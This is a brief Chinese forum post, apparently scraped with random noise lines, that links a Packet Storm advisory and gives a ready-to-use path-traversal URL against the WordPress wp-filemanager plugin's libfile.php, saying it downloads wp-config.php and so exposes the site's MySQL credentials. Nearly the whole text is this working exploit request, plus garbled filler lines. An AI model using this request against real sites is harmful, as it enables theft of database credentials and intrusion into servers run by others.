洞详解:http://packetstormsecurity.com/f ... -File-Download.html
/ y& a0 z( ~4 o$ z% f: c6 v
+ F, A$ p" o' I. b1 a查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
5 b; W" y. J6 I' y: v' X# J |